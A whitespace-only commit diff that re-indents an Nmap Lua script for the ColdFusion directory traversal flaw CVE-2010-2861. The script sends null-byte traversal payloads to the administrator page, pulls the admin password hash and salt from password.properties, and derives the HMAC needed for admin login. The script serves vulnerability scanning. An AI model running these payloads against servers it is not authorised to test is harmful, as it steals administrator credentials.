Re-indent some scripts. Whitespace-only commit
https://secwiki.org/w/Nmap/Code_Standards
@@ -60,80 +60,80 @@ portrule = shortport.http
|
||||
action = function(host, port)
|
||||
|
||||
local vuln = {
|
||||
title = 'Adobe ColdFusion Directory Traversal Vulnerability',
|
||||
state = vulns.STATE.NOT_VULN, -- default
|
||||
IDS = {CVE = 'CVE-2010-2861', OSVDB = '67047'},
|
||||
description = [[
|
||||
title = 'Adobe ColdFusion Directory Traversal Vulnerability',
|
||||
state = vulns.STATE.NOT_VULN, -- default
|
||||
IDS = {CVE = 'CVE-2010-2861', OSVDB = '67047'},
|
||||
description = [[
|
||||
Multiple directory traversal vulnerabilities in the administrator console
|
||||
in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the
|
||||
locale parameter]],
|
||||
references = {
|
||||
'http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking',
|
||||
'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861',
|
||||
'http://osvdb.org/67047',
|
||||
'http://www.nessus.org/plugins/index.php?view=single&id=48340',
|
||||
},
|
||||
dates = {
|
||||
disclosure = {year = '2010', month = '08', day = '10'},
|
||||
},
|
||||
}
|
||||
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
|
||||
references = {
|
||||
'http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking',
|
||||
'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861',
|
||||
'http://osvdb.org/67047',
|
||||
'http://www.nessus.org/plugins/index.php?view=single&id=48340',
|
||||
},
|
||||
dates = {
|
||||
disclosure = {year = '2010', month = '08', day = '10'},
|
||||
},
|
||||
}
|
||||
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
|
||||
|
||||
-- Function to do the look up and return content
|
||||
local grabAndGrep = function(page)
|
||||
-- Do the HTTP GET request for the page
|
||||
local response = http.get(host, port, page)
|
||||
-- Check to see if we get a good page returned
|
||||
-- Is there no response?
|
||||
if ( not(response.status) ) then
|
||||
return false, "Received no response from HTTP server"
|
||||
end
|
||||
-- Function to do the look up and return content
|
||||
local grabAndGrep = function(page)
|
||||
-- Do the HTTP GET request for the page
|
||||
local response = http.get(host, port, page)
|
||||
-- Check to see if we get a good page returned
|
||||
-- Is there no response?
|
||||
if ( not(response.status) ) then
|
||||
return false, "Received no response from HTTP server"
|
||||
end
|
||||
|
||||
-- Is the response not an HTTP 200 code?
|
||||
if ( response.status ~= 200 ) then
|
||||
return false, ("The server returned an unexpected response (%d)"):format(response.status )
|
||||
end
|
||||
-- Is the response not an HTTP 200 code?
|
||||
if ( response.status ~= 200 ) then
|
||||
return false, ("The server returned an unexpected response (%d)"):format(response.status )
|
||||
end
|
||||
|
||||
-- Now check the body for our strings
|
||||
if ( response.body ) then
|
||||
local saltcontent = response.body:match("salt.*value=\"(%d+)")
|
||||
local hashcontent = response.body:match("password=(%x%x%x%x+)") --Extra %x's needed or it will match strings that are not the long hex password
|
||||
-- Now check the body for our strings
|
||||
if ( response.body ) then
|
||||
local saltcontent = response.body:match("salt.*value=\"(%d+)")
|
||||
local hashcontent = response.body:match("password=(%x%x%x%x+)") --Extra %x's needed or it will match strings that are not the long hex password
|
||||
|
||||
-- If a page has both the salt and the password in it then the exploit has been successful
|
||||
if ( saltcontent and hashcontent ) then
|
||||
vuln.state = vulns.STATE.EXPLOIT
|
||||
-- Generate HMAC as this is what the web application needs for authentication as admin
|
||||
local hmaccontent = stdnse.tohex(openssl.hmac('sha1', saltcontent, hashcontent)):upper()
|
||||
--return true, ("\n\tHMAC: %s\n\tSalt: %s\n\tHash: %s"):format(hmaccontent, saltcontent, hashcontent)
|
||||
local result = {
|
||||
("HMAC: %s"):format(hmaccontent),
|
||||
("Salt: %s"):format(saltcontent),
|
||||
("Hash: %s"):format(hashcontent)
|
||||
}
|
||||
return true, result
|
||||
end
|
||||
end
|
||||
return false, "Not vulnerable"
|
||||
end
|
||||
-- If a page has both the salt and the password in it then the exploit has been successful
|
||||
if ( saltcontent and hashcontent ) then
|
||||
vuln.state = vulns.STATE.EXPLOIT
|
||||
-- Generate HMAC as this is what the web application needs for authentication as admin
|
||||
local hmaccontent = stdnse.tohex(openssl.hmac('sha1', saltcontent, hashcontent)):upper()
|
||||
--return true, ("\n\tHMAC: %s\n\tSalt: %s\n\tHash: %s"):format(hmaccontent, saltcontent, hashcontent)
|
||||
local result = {
|
||||
("HMAC: %s"):format(hmaccontent),
|
||||
("Salt: %s"):format(saltcontent),
|
||||
("Hash: %s"):format(hashcontent)
|
||||
}
|
||||
return true, result
|
||||
end
|
||||
end
|
||||
return false, "Not vulnerable"
|
||||
end
|
||||
|
||||
local exploits = {
|
||||
['CFusionMX'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties%00en',
|
||||
['CFusionMX7'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties%00en',
|
||||
['ColdFusion8'] = '..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en',
|
||||
['JRun4\\servers'] = '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties%00en',
|
||||
}
|
||||
local exploits = {
|
||||
['CFusionMX'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties%00en',
|
||||
['CFusionMX7'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties%00en',
|
||||
['ColdFusion8'] = '..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en',
|
||||
['JRun4\\servers'] = '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties%00en',
|
||||
}
|
||||
|
||||
local results = {}
|
||||
for prod, exploit in pairs(exploits) do
|
||||
local status, result = grabAndGrep('/CFIDE/administrator/enter.cfm?locale=' .. exploit)
|
||||
if ( status or ( not(status) and nmap.verbosity() > 1 ) ) then
|
||||
if ( "string" == type(result) ) then
|
||||
result = { result }
|
||||
end
|
||||
result.name = prod
|
||||
table.insert(results, result )
|
||||
end
|
||||
end
|
||||
vuln.extra_info=stdnse.format_output(true, results)
|
||||
return vuln_report:make_output(vuln)
|
||||
local results = {}
|
||||
for prod, exploit in pairs(exploits) do
|
||||
local status, result = grabAndGrep('/CFIDE/administrator/enter.cfm?locale=' .. exploit)
|
||||
if ( status or ( not(status) and nmap.verbosity() > 1 ) ) then
|
||||
if ( "string" == type(result) ) then
|
||||
result = { result }
|
||||
end
|
||||
result.name = prod
|
||||
table.insert(results, result )
|
||||
end
|
||||
end
|
||||
vuln.extra_info=stdnse.format_output(true, results)
|
||||
return vuln_report:make_output(vuln)
|
||||
end
|
||||
|
||||